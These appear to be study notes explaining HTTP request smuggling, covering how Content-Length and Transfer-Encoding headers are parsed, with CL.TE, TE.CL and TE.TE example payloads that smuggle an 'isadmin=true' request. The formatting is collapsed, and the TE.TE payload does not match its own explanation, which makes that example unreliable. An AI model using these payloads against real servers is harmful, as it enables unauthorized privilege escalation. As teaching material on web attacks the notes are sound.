Headers Involved

Emphasis on headers:

• Content-Length that states the number of characters of the content, example:

POST /update HTTP/1.1Host: example.comContent-Length: 13Content-Type: application/x-www-form-urlencodedisadmin=true

• Transfer-Encoding that states the number of characters of the content in hexadecimal, example:

POST /search HTTP/1.1Host: example.comTransfer-Encoding: chunkedeq=smuggledData0

Transfer-Encoding usually has the value ofchunked, others includecompress,deflate andgzip.

HTTP Smuggling when the front-end and back-end server prioritise one header over another, so when both are used in a HTTP request, it may cause inconsistent responses between front and back end servers.

CL.TE Example

CL.TE meansContent-Length/Transfer-Encoding. So front end prioritisesCL and back end prioritisesTE.

POST /search HTTP/1.1Host: example.comContent-Length: 130Transfer-Encoding: chunked0POST /update HTTP/1.1Host: example.comContent-Length: 13Content-Type: application/x-www-form-urlencodedisadmin=true

HTTP Smuggling is basically sneaking in a message in another.

Here, the front-end server sees theContent-Length of130 bytes and believes the request ends afterisadmin=true. However, the back-end server sees theTransfer-Encoding: chunked and interprets the0 as the end of a chunk, making the second request the start of a new chunk. This can lead to the back-end server treating thePOST /update HTTP/1.1 as a separate, new request, potentially giving the attacker unauthorized access.

Be mindful of incorrectContent-Length. If it's value is set to 25 but the actual length of content is 30, the server will only process the first 25 characters.

TE.CL Example

TE.CL meansTransfer-Encoding/Content-Length. So front end prioritisesTE and back end prioritisesCL.

POST / HTTP/1.1Host: example.comContent-Length: 4Transfer-Encoding: chunked78POST /update HTTP/1.1Host: example.comContent-Type: application/x-www-form-urlencodedContent-Length: 15isadmin=true0

In the above payload, the front-end server sees theTransfer-Encoding: chunked header and processes the request as chunked. The78 (hexadecimal for 120) indicates that the next 120 bytes are part of the current request's body. The front-end server considers everything up to the0 (indicating the end of the chunked message) as part of the body of the first request.

The back-end server, however, uses theContent-Length header, which is set to4. It processes only the first 4 bytes of the request, not including the entire smuggled requestPOST /update. The remaining part of the request, starting fromPOST /update, is then interpreted by the back-end server as a separate, new request.

TE.TE Example

TE.TE meansTransfer-Encoding/Transfer-Encoding AKATransfer Encoding Obfuscation. So front end prioritisesTE and back end prioritisesTE.

TheTE.TE vulnerability doesn't always require multipleTransfer-Encoding headers. Instead, it often involves asingle, malformedTransfer-Encoding header that is interpreted differently by the front-end and back-end servers.

Aim:make one server ignore the TE header and use CL instead

POST / HTTP/1.1Host: example.comContent-length: 4Transfer-Encoding: chunkedTransfer-Encoding: chunked14ePOST /update HTTP/1.1Host: example.comContent-length: 15isadmin=true0

In the above payload, the front-end server encounterstwoTransfer-Encoding headers. The first one is a standardchunked encoding, but the second one,chunked1, is non-standard. Depending on its configuration, the front-end server might process the request based on the firstTransfer-Encoding: chunked header and ignore the malformedchunked1, interpreting the entire request up to the0 as a single chunked message.

The back-end server, however, might handle the malformedTransfer-Encoding: chunked1 differently. It could either reject the malformed part and process the request similarly to the front-end server or interpret the request differently due to the presence of the non-standard header. If it processes only the first 4 bytes as indicated by theContent-length: 4, the remaining part of the request starting fromPOST /update is then treated as a separate, new request.